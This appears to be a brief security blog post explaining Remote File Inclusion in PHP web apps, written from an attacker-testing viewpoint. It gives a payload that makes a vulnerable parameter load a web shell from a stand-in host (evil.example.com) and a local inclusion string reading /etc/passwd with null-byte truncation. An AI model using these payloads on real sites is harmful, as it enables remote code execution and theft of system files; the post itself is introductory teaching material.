Remote File Inclusions
Posted by: Dan O'Connor
Uncategorized
I am currently testing a few php shells that I have against a test php site I created, and I thought I would share some of the basics of a RFI ( Remote File Inclusion ). When I need to deal with web apps this is the second thing I will try right after SQL injection.
Here is the wikipedia article for another explanation.
In most cases I would use this to either display the contents of a file or execute another php script like a php based shell. If I am not really sure what I am looking for I will use a php based shell, something like this.
Typically what I will do is crawl the site and look for variables on each page and attempt something like this (borrowed from the wikipedia example).
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
A very simple and powerful method to attack sites.
Also it can be used for local file traversal, instead of a remote file you can specify a local file.
/vulnerable.php?COLOR=/etc/passwd%00
In these cases the %00 is very important for your success.
Comment
RSS Feed
Email a friend
